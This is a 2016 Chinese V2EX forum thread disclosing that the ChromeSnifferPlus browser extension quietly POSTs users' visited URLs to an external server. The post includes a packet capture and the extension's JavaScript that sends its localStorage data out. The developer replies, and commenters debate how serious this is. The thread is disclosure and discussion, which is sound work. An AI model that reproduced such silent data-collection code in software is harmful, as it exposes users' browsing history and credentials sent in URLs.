V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
zwbai
V2EX  ›  分享发现

ChromeSnifferPlus 插件疑似恶意采集用户访问信息

  •  3
     
  •   zwbai · 2016-01-06 10:20:05 +08:00 · 3445 次点击
    这是一个创建于 3279 天前的主题,其中的信息可能已经有所发展或是发生改变。

    ChromeSnifferPlus 是国人开发的一款开源网站探测插件,可以探测正在使用的开源软件或者 js 类库,在国内外都有一定的使用群体
    该插件会一定条件下把用户访问过的 url 地址,秘密发送到一个美国服务器
    服务器 URL 地址为

    http://jjc.link/status/v2
    

    wireshark 抓包

    POST /status/v2 HTTP/1.1
    Host: jjc.link
    Connection: keep-alive
    Content-Length: 1126
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
    Origin: chrome-extension://modoldoikofeihcogpldkollonflkdic
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Accept: */*
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: zh-CN,zh;q=0.8
    
    ld=%7B%22http%3A%2F%2Fqunaer.com%2F%22%3A%22%7B%5C%22libs%5C%22%3A%5C%22%7B%5C%5C%5C%22%E7%99%BE%E5%BA%A6%E7%BB%9F%E8%AE%A1%5C%5C%5C%22%3A-1%2C%5C%5C%5C%22jQuery%5C%5C%5C%22%3A%5C%5C%5C%221.9.1%5C%5C%5C%22%2C%5C%5C%5C%22jQuery%20UI%5C%5C%5C%22%3A%5C%5C%5C%221.10.3%5C%5C%5C%22%2C%5C%5C%5C%22PHP%5C%5C%5C%22%3A%5C%5C%5C%225.2.17p1%5C%5C%5C%22%2C%5C%5C%5C%22nginx%5C%5C%5C%22%3A-1%7D%5C%22%2C%5C%22add_time%5C%22%3A1451980052484%7D%22%2C%22http%3A%2F%2Fwww.sogou.com%2F%3Frfrom%3Dsoso%22%3A%22%7B%5C%22libs%5C%22%3A%5C%22%7B%5C%5C%5C%22jQuery%5C%5C%5C%22%3A%5C%5C%5C%221.11.0%5C%5C%5C%22%2C%5C%5C%5C%22nginx%5C%5C%5C%22%3A-1%7D%5C%22%2C%5C%22add_time%5C%22%3A1451979843360%7D%22%2C%22http%3A%2F%2Fwww.sogou.com%2Fweb%3Fquery%3Dmanager%26_asf%3Dwww.sogou.com%26_ast%3D%26ie%3Dutf8%26pid%3Ds.idx%26cid%3Ds.idx.se%26rfrom%3Dsoso%26unc%3D%26w%3D01019900%26sut%3D1368%26sst0%3D1451979849303%26lkt%3D7%252C1451979847939%252C1451979849111%22%3A%22%7B%5C%22libs%5C%22%3A%5C%22%7B%5C%5C%5C%22jQuery%5C%5C%5C%22%3A%5C%5C%5C%221.11.0%5C%5C%5C%22%2C%5C%5C%5C%22nginx%5C%5C%5C%22%3A-1%7D%5C%22%2C%5C%22add_time%5C%22%3A1451979854478%7D%22%7DHTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Jan 2016 07:47:35 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Content-Encoding: gzip
    
    14
    ....................
    0
    

    数据包解密内容

    ld={"http://qunaer.com/":"{\"libs\":\"{\\\"百度统计\\\":-1,\\\"jQuery\\\":\\\"1.9.1\\\",\\\"jQuery UI\\\":\\\"1.10.3\\\",\\\"PHP\\\":\\\"5.2.17p1\\\",\\\"nginx\\\":-1}\",\"add_time\":1451980052484}","http://www.sogou.com/?rfrom=soso":"{\"libs\":\"{\\\"jQuery\\\":\\\"1.11.0\\\",\\\"nginx\\\":-1}\",\"add_time\":1451979843360}","http://www.sogou.com/web?query=manager&_asf=www.sogou.com&_ast=&ie=utf8&pid=s.idx&cid=s.idx.se&rfrom=soso&unc=&w=01019900&sut=1368&sst0=1451979849303&lkt=7%2C1451979847939%2C1451979849111":"{\"libs\":\"{\\\"jQuery\\\":\\\"1.11.0\\\",\\\"nginx\\\":-1}\",\"add_time\":1451979854478}"}
    

    经过多次抓包,发现服务器返回值都为 14/0,所以基本可以判断不是云查询类功能

    作者在 github 的开源地址为

    https://github.com/justjavac/ChromeSnifferPlus
    

    代码不多,经过排查,发现窃取信息的 js 为

    https://github.com/justjavac/ChromeSnifferPlus/blob/master/js/api.js
    

    代码片段

    var url = 'http://jjc.link/status/v2';
    
            if (localStorage.length === 0) {
                return;
            }
    
            var data = "ld=" + encodeURIComponent(JSON.stringify(localStorage));
    
            xhr('POST', url, data, function(data, status, response){
                callback();
            });
    

    该插件会把访问过的 url 都归类发往 jjc.link 服务器,根据网站的验证方式不同,可能会泄露的隐私

    • 用户 ip
    • 访问过的网站地址
    • 网站后台
    • 用户名 /密码( get 方式)
    • session 值(get 方式)

    暂时不知作者收集这些信息的目的,请使用 ChromeSnifferPlus 的用户多加小心

    19 条回复    2016-01-07 19:56:52 +08:00
    Ellison
        1
    Ellison  
       2016-01-06 11:45:28 +08:00
    @justjavac
    直接圈作者啊
    zwbai
        2
    zwbai  
    OP
       2016-01-06 13:09:57 +08:00
    奇怪我文章首页显示为什么会显示一天前呢
    Tink
        3
    Tink  
       2016-01-06 13:13:51 +08:00
    关注
    Tink
        4
    Tink  
       2016-01-06 13:14:02 +08:00
    @zwbai 下方又个置顶
    oott123
        5
    oott123  
       2016-01-06 13:18:16 +08:00
    居然发送 localStorage ,这地没法洗了吧。
    没听说过什么统计脚本要统计 localStorage 的。
    mcone
        6
    mcone  
       2016-01-06 19:46:20 +08:00
    好奇怪的访问 不懂 bd
    coolzilj
        7
    coolzilj  
       2016-01-07 13:20:13 +08:00 via iPhone
    作者已回复, https://github.com/justjavac/ChromeSnifferPlus/issues/58
    这理由…接受不了把 localstorage 发送给别人,已卸
    justjavac
        8
    justjavac  
       2016-01-07 16:25:24 +08:00
    所有代码都是开源的,大家可以审视
    ooTwToo
        9
    ooTwToo  
       2016-01-07 16:26:26 +08:00
    wappalyzer 不知有没有这个问题
    xbflrghc
        10
    xbflrghc  
       2016-01-07 16:30:58 +08:00
    这个不是开源的吗?到底收集了啥,看看不就知道了吗?
    xbflrghc
        11
    xbflrghc  
       2016-01-07 16:32:35 +08:00
    @oott123
    @coolzilj

    插件只能访问插件记录的 localstorage ,这个应该不是发送了用户浏览器的 localstorage
    xbflrghc
        12
    xbflrghc  
       2016-01-07 16:52:57 +08:00
    @ooTwToo https://github.com/AliasIO/Wappalyzer/blob/master/src/drivers/chrome/js/driver.js#L208_L242

    wappalyzer 的源码

    w.driver.post('https://ad.wappalyzer.com/log/wp/', w.adCache);

    xhr.send('json=' + encodeURIComponent(JSON.stringify(data)));
    justjavac
        13
    justjavac  
       2016-01-07 17:03:06 +08:00
    @coolzilj

    "这理由…接受不了把 localstorage 发送给别人,已卸"

    有必要解释一下了。不要代码片段而断章取义。我没有把 localstorage 发给别人,也没有访问用户的任何 localstorage 信息。

    这个文件的代码运行在 background ,而 background 的代码是无法访问页面的,只能访问插件。这里的 localstorage 是插件为了存储探测到的信息而使用的。然后把信息发送到分析服务器。
    ooTwToo
        14
    ooTwToo  
       2016-01-07 17:44:34 +08:00
    @xbflrghc 啊好吧,并没有把上传全部的 localstorage 。
    oott123
        15
    oott123  
       2016-01-07 18:17:59 +08:00
    好吧,如果是插件自己的 localStorage ,问题不大。

    不过好在我也没用,哈哈哈(
    zwbai
        16
    zwbai  
    OP
       2016-01-07 18:26:57 +08:00
    安装插件后,访问所有网站都会默认开启网站探测,发送插件自己的 localStorage ,意味着用插件期间访问什么还是发什么啊,也就是发送所有浏览记录,原来 360 云采集信息泄露, get 方式的验证密码的也是很多。。
    zwbai
        17
    zwbai  
    OP
       2016-01-07 18:38:56 +08:00
    @xbflrghc @oott123 @justjavac 因为是个全局插件,全 url 地址采集,泄露敏感信息肯定是不可避免的,比如我看个小黄片啥的..隐私泄露具体可搜索 "360 隐私泄露门的演变时间表"做参考
    oott123
        18
    oott123  
       2016-01-07 19:55:25 +08:00
    @zwbai 这确实是会导致隐私泄漏问题,然而比上传 localStorage 的危害小多了。
    #反正我也不用#
    另外看更新记录,已经增加了选项去掉这个功能。
    oott123
        19
    oott123  
       2016-01-07 19:56:52 +08:00
    @oott123 看错了,是“将要”增加,不是“已经”增加。
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   958 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 24ms · UTC 20:54 · PVG 04:54 · LAX 12:54 · JFK 15:54
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.